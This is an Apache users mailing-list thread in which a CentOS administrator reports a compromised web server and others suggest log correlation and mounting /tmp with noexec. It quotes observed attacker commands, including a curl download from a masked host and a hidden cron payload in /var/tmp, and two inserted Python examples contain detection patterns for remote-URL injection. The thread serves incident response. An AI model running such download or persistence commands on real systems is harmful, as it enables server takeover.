Posted to users@httpd.apache.org by Luisa Ester Navarro <lu...@hotmail.com> on 2012/01/09 16:11:05 UTC

[users@httpd] attack on apache

My server is being attacked. I think it is from apache because I have found commands running with the owner apache.
My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL  and  sh -c curl -o http ....

They also run every minute a crontab from /var/spool/cron and I didn't have anyone there. 
I am using Centos 5.7 and httpd-2.2.3.53-el5.centos.3 and my system is updated.
Can someone help me?
Thanks in advance

Luisa

Re: [users@httpd] attack on apache

Posted by "Kevin A. McGrail" <KM...@PCCC.com>.
>              any idea how to start researching which is the leaky script
Checking the access log for the same ip that was getting the errors you 
found in the error_log is a good start.

---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
   "   from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org


Re: [users@httpd] attack on apache

Posted by Jaco Kroon <ja...@uls.co.za>.
Hi,

On 12/01/12 00:14, Jeroen Geilman wrote:
> On 01/11/2012 10:10 PM, Jaco Kroon wrote:
>> On 11/01/12 22:37, Luisa Ester Navarro wrote:
>>>
>>>
>>> ------------------------------------------------------------------------
>>> J.
>>> Thanks Jeron:
>>>              any idea how to start researching which is the leaky script
>>> Cheers
>>> Luisa
>> Hehe, this is where they say, RTFS, or as Jeron suggested, see if you 
>> can correlate something in the logs.  If apache is still running and 
>> you happen to have mod_info, it's useful as it at least gives you the 
>> paths being processed, often the "child script" will hold up the 
>> processing and you can then spot the script in use in the mod_info 
>> data, in other cases, it's a wild goose chase.
>
> I think you are referring to the server-status handler provided by 
> mod_status, which shows the URIs currently being served if you set the 
> global option ExtendedStatus to On.
Of course you're right - my mistake.

Kind Regards,
Jaco

Re: [users@httpd] attack on apache

Posted by Jeroen Geilman <je...@adaptr.nl>.
On 01/11/2012 10:10 PM, Jaco Kroon wrote:
> On 11/01/12 22:37, Luisa Ester Navarro wrote:
>>
>>
>> ------------------------------------------------------------------------
>> J.
>> Thanks Jeron:
>>              any idea how to start researching which is the leaky script
>> Cheers
>> Luisa
> Hehe, this is where they say, RTFS, or as Jeron suggested, see if you 
> can correlate something in the logs.  If apache is still running and 
> you happen to have mod_info, it's useful as it at least gives you the 
> paths being processed, often the "child script" will hold up the 
> processing and you can then spot the script in use in the mod_info 
> data, in other cases, it's a wild goose chase.

I think you are referring to the server-status handler provided by 
mod_status, which shows the URIs currently being served if you set the 
global option ExtendedStatus to On.

-- 
J.


Re: [users@httpd] attack on apache

Posted by Jaco Kroon <ja...@uls.co.za>.
On 11/01/12 22:37, Luisa Ester Navarro wrote:
>
>
> ------------------------------------------------------------------------
> J.
> Thanks Jeron:
>              any idea how to start researching which is the leaky script
> Cheers
> Luisa
Hehe, this is where they say, RTFS, or as Jeron suggested, see if you 
can correlate something in the logs.  If apache is still running and you 
happen to have mod_info, it's useful as it at least gives you the paths 
being processed, often the "child script" will hold up the processing 
and you can then spot the script in use in the mod_info data, in other 
cases, it's a wild goose chase.

mpm_user also helps to narrow things down in case of vhost setups (ISP 
... find the offending user - disable the vhost - that usually gets the 
offender's attention, and when you tell him/her that his code is bust and 
they need to audit their code, they usually end up paying me for my time 
to do it, which usually just involves pointing to one of the latest 
joomla/wordpress/flavor of the month CMS exploits).

With respect to the logs, often you'll find URIs in the GET parameters, 
so perhaps you can try grepping your logs for a regex, something like 
grep -E '\?.*http://' access_log and see if that shows anything.

I'm afraid there are no real shortcuts.

Good luck.

JK
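An added example, not code from Kevin's or Jaco's posts: the log correlation both replies describe (Kevin: take the client IPs from error_log and look them up in access_log; Jaco: grep access_log for URLs passed in GET parameters) as a small Python script over constructed sample lines in Apache 2.2 log format. All IPs, URIs and log lines are made up.

```python
import re
from collections import defaultdict

# Apache 2.2 access_log line in common/combined format: client IP first,
# then the request line in quotes and the status code.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')
# Apache 2.2 error_log entries that carry a client address.
ERROR_CLIENT_RE = re.compile(r'\[client (?P<ip>[^\]\s]+)\]')
# A URL handed over as a GET parameter value: the same idea as the
# grep -E '\?.*http://' suggested in the thread, plus URL-encoded colons.
REMOTE_URL_IN_QUERY = re.compile(r'\?.*=(?:https?|ftp)(?::|%3[Aa])')

# Constructed sample log lines (not taken from the poster's server).
ACCESS_LOG = """\
192.0.2.10 - - [11/Jan/2012:20:55:10 +0100] "GET /index.php?page=http://203.0.113.5/x.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Jan/2012:20:55:11 +0100] "GET /about.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.10 - - [11/Jan/2012:20:55:12 +0100] "GET /index.php?page=contact HTTP/1.1" 200 777 "-" "Mozilla/5.0"
203.0.113.77 - - [11/Jan/2012:20:56:01 +0100] "POST /wp-login.php HTTP/1.1" 302 0 "-" "curl/7.19.7"
""".splitlines()
ERROR_LOG = """\
[Wed Jan 11 20:55:12 2012] [error] [client 192.0.2.10] sh: del: command not found
[Wed Jan 11 20:55:12 2012] [error] [client 192.0.2.10] sh: xx: Permission denied
[Wed Jan 11 20:57:00 2012] [notice] caught SIGTERM, shutting down
""".splitlines()

def error_log_clients(error_lines):
    """Client IPs that show up in error_log entries."""
    ips = set()
    for line in error_lines:
        m = ERROR_CLIENT_RE.search(line)
        if m:
            ips.add(m.group('ip'))
    return ips

def suspicious_requests(access_lines, error_lines):
    """Map client IP -> URIs requested, for requests that either came from an
    IP seen in error_log or carry a remote URL inside the query string."""
    noisy_ips = error_log_clients(error_lines)
    hits = defaultdict(list)
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # unparseable line: skip rather than guess
        ip, uri = m.group('ip'), m.group('uri')
        if ip in noisy_ips or REMOTE_URL_IN_QUERY.search(uri):
            hits[ip].append(uri)
    return dict(hits)
```

Run it over the real files with open('/var/log/httpd/access_log') and open('/var/log/httpd/error_log') in place of the sample lists; the reported URIs are the scripts to audit first.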

RE: [users@httpd] attack on apache

Posted by Luisa Ester Navarro <lu...@hotmail.com>.


> Date: Wed, 11 Jan 2012 21:13:53 +0100
> From: jeroen@adaptr.nl
> To: users@httpd.apache.org
> Subject: Re: [users@httpd] attack on apache
>
> On 01/11/2012 09:10 PM, Jaco Kroon wrote:
>> On 11/01/12 21:35, Jeroen Geilman wrote:
>>>> In /var/log/httpd/error_log I see things like this
>>>> sh: del comand no found
>>>> sh: xx Permission denied
>>>>
>>>> I need help !
>>>
>>> 1. Stop apache.
>>> 2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
>>> 3. remove the bad script.
>>
>> 4.  Remount /tmp with noexec,nosuid,nodev to prevent the majority of these types of exploits.
>
> Surely you noticed that I did not advise him to turn it back on - at all ? ;)
>
> But yes, distros that don't protect /tmp suck.
>
> -- 
> J.

Thanks Jeron:
            any idea how to start researching which is the leaky script
Cheers
Luisa

Re: [users@httpd] attack on apache

Posted by Jeroen Geilman <je...@adaptr.nl>.
On 01/11/2012 09:10 PM, Jaco Kroon wrote:
> On 11/01/12 21:35, Jeroen Geilman wrote:
>>
>>>
>>> In /var/log/httpd/error_log I see things like this
>>> sh: del comand no found
>>> sh: xx Permission denied
>>>
>>> I need help !
>>>
>>
>> 1. Stop apache.
>> 2. investigate which leaky, creaky or lousy PHP script allowed this 
>> exploit.
>> 3. remove the bad script.
> 4.  Remount /tmp with noexec,nosuid,nodev to prevent the majority of 
> these types of exploits.

Surely you noticed that I did not advise him to turn it back on - at all 
? ;)
But yes, distros that don't protect /tmp suck.


-- 
J.


Re: [users@httpd] attack on apache

Posted by Jaco Kroon <ja...@uls.co.za>.
On 11/01/12 21:35, Jeroen Geilman wrote:
>
>>
>> In /var/log/httpd/error_log I see things like this
>> sh: del comand no found
>> sh: xx Permission denied
>>
>> I need help !
>>
>
> 1. Stop apache.
> 2. investigate which leaky, creaky or lousy PHP script allowed this 
> exploit.
> 3. remove the bad script.
4.  Remount /tmp with noexec,nosuid,nodev to prevent the majority of 
these types of exploits.

It doesn't eliminate them, just prevents the majority of "canned" ones 
that I'm aware of.

JK
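An added example (not from the thread): a Python check that parses /proc/mounts-style lines and reports which of noexec,nosuid,nodev are missing on /tmp and /var/tmp, the mounts discussed above (/var/tmp is included because the cron job in this thread ran from /var/tmp/.autorun). The sample mount table is constructed; as Jaco notes, the options only block the majority of canned scripts, and this check only tells you whether they are set.

```python
import os

# Mount options the thread recommends for /tmp; /var/tmp is checked as well
# because the cron job reported in the thread ran from /var/tmp/.autorun.
REQUIRED = ("noexec", "nosuid", "nodev")
WATCHED = ("/tmp", "/var/tmp")

# Constructed /proc/mounts excerpt: /tmp lacks noexec, /var/tmp is not its
# own mount at all, and the bind-mounted /var/named/chroot/proc is just noise.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,relatime,data=ordered 0 0
/dev/sda3 /tmp ext3 rw,nosuid,nodev,relatime 0 0
proc /proc proc rw,relatime 0 0
none /var/named/chroot/proc proc rw,relatime 0 0
"""

def parse_mounts(text):
    """Map mount point -> set of mount options from /proc/mounts-style lines
    (device, mount point, fstype, options, ...)."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0].startswith("#"):
            continue
        point, opts = fields[1], fields[3]
        mounts[point] = set(opts.split(","))  # later entries (overmounts) win
    return mounts

def missing_hardening(text, watched=WATCHED):
    """Return {mount point: [missing options]} for the watched directories.
    A directory that is not a separate mount point inherits its parent's
    (normally exec) options, so it is reported with all three missing."""
    mounts = parse_mounts(text)
    report = {}
    for point in watched:
        opts = mounts.get(point, set())
        missing = [o for o in REQUIRED if o not in opts]
        if missing:
            report[point] = missing
    return report

if __name__ == "__main__":
    # On Linux read the live table; elsewhere fall back to the constructed sample.
    source = "/proc/mounts" if os.path.exists("/proc/mounts") else None
    text = open(source).read() if source else SAMPLE_MOUNTS
    print(missing_hardening(text) or "all watched mounts carry noexec,nosuid,nodev")
```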

Re: [users@httpd] attack on apache

Posted by Jeroen Geilman <je...@adaptr.nl>.
On 01/11/2012 08:24 PM, Luisa Ester Navarro wrote:
>
>
> ------------------------------------------------------------------------
> From: luisa2010@hotmail.com
> To: users@httpd.apache.org
> Subject: RE: [users@httpd] attack on apache
> Date: Wed, 11 Jan 2012 16:15:14 -0300
>
>
>
> > Date: Mon, 9 Jan 2012 17:30:21 +0000
> > From: tevans.uk@googlemail.com
> > To: users@httpd.apache.org
> > Subject: Re: FW: [users@httpd] attack on apache
> >
> > On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> > <lu...@hotmail.com> wrote:
> > >
> > >
> > > ________________________________
> > >
> > > I didn't have any cronjobs but when I detected the attack I saw 
> > > one in
> > > /var/spool/cron
> > >  My logfile says
> > > User apache:
> > >
> > >        /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> > >
> > >        personal crontab deleted: 56 Time(s)
> > >
> > >        personal crontab listed: 1 Time(s)
> > >
> > >        personal crontab replaced: 1 Time(s)
> > >
> > > Thanks
> > >
> >
> > Google tells me that this is output from a cpanel perl script -
> > probably a crontab editor. crontabs are not evidence of an attack.
> >
>
> > You need to show more details of what you think is happening, and why
> > you think it is malicious.
> > Cheers
>
> Tom
>
> I think it is an attack because I found these commands running on my 
> server (with owner apache)
>
> /usr/local/apache/bin/httpd - DSFSL
> sh -c curl -O http://xxxx
>
> I also found a folder proc in /var/named/chroot. This folder is the 
> same as /proc, is updated with the original /proc and I can't delete it.

That is a bind mount, and probably unrelated. It may be necessary to run 
BIND chrooted.

>
> In /var/log/httpd/error_log I see things like this
> sh: del comand no found
> sh: xx Permission denied
>
> I need help !
>

1. Stop apache.
2. investigate which leaky, creaky or lousy PHP script allowed this exploit.
3. remove the bad script.


-- 
J.


RE: [users@httpd] attack on apache

Posted by Luisa Ester Navarro <lu...@hotmail.com>.


From: luisa2010@hotmail.com
To: users@httpd.apache.org
Subject: RE: [users@httpd] attack on apache
Date: Wed, 11 Jan 2012 16:15:14 -0300


> Date: Mon, 9 Jan 2012 17:30:21 +0000
> From: tevans.uk@googlemail.com
> To: users@httpd.apache.org
> Subject: Re: FW: [users@httpd] attack on apache
> 
> On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
> <lu...@hotmail.com> wrote:
> >
> >
> > ________________________________
> >
> > I didn't have any cronjobs but when I detected the attack I saw one in
> > /var/spool/cron
> >  My logfile says
> > User apache:
> >
> >        /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
> >
> >        personal crontab deleted: 56 Time(s)
> >
> >        personal crontab listed: 1 Time(s)
> >
> >        personal crontab replaced: 1 Time(s)
> >
> > Thanks
> >
> 
> Google tells me that this is output from a cpanel perl script -
> probably a crontab editor. crontabs are not evidence of an attack.
> 

> You need to show more details of what you think is happening, and why
> you think it is malicious.
> Cheers

Tom

I think it is an attack because I found these commands running on my server (with owner apache)

/usr/local/apache/bin/httpd - DSFSL
sh -c curl -O http://xxxx

I also found a folder proc in /var/named/chroot. This folder is the same as /proc, is updated with the original /proc and I can't delete it.

In /var/log/httpd/error_log I see things like this
sh: del comand no found
sh: xx Permission denied

I need help !

Thanks

Luisa

Re: FW: [users@httpd] attack on apache

Posted by Tom Evans <te...@googlemail.com>.
On Mon, Jan 9, 2012 at 5:20 PM, Luisa Ester Navarro
<lu...@hotmail.com> wrote:
>
>
> ________________________________
>
> I didn't have any cronjobs but when I detected the attack I saw one in
> /var/spool/cron
>  My logfile says
> User apache:
>
>        /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
>
>        personal crontab deleted: 56 Time(s)
>
>        personal crontab listed: 1 Time(s)
>
>        personal crontab replaced: 1 Time(s)
>
> Thanks
>

Google tells me that this is output from a cpanel perl script -
probably a crontab editor. crontabs are not evidence of an attack.

You need to show more details of what you think is happening, and why
you think it is malicious.

Cheers

Tom



FW: [users@httpd] attack on apache

Posted by Luisa Ester Navarro <lu...@hotmail.com>.
I didn't have any cronjobs but when I detected the attack I saw one in /var/spool/cron
My logfile says:
User apache:
       /var/tmp/.autorun/update >/dev/null 2>&1: 2162 Time(s)
       personal crontab deleted: 56 Time(s)
       personal crontab listed: 1 Time(s)
       personal crontab replaced: 1 Time(s)

Thanks

> Date: Mon, 9 Jan 2012 18:05:38 +0100
> From: info@simonecaruso.com
> To: users@httpd.apache.org
> CC: luisa2010@hotmail.com
> Subject: Re: [users@httpd] attack on apache
> 
> On 09/01/2012 16:11, Luisa Ester Navarro wrote:
> > My server is being attacked. I think it is from apache because I have found
> > commands running with the owner apache.
> > My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL 
> > and  sh -c curl -o http ....
> > 
> 
> I don't think they exploited apache, maybe an application level bug. Are the
> cronjobs running as the apache user?
> 
> 
> -- 
> Simone Caruso
> IT Consultant
> +39 349 65 90 805

Re: [users@httpd] attack on apache

Posted by Simone Caruso <in...@simonecaruso.com>.
On 09/01/2012 16:11, Luisa Ester Navarro wrote:
> My server is being attacked. I think it is from apache because I have found
> commands running with the owner apache.
> My httpd is on /usr/sbin and they run on /usr/local/apache/bin/httpd -DSFSL 
> and  sh -c curl -o http ....
> 

I don't think they exploited apache, maybe an application level bug. Are the
cronjobs running as the apache user?


-- 
Simone Caruso
IT Consultant
+39 349 65 90 805
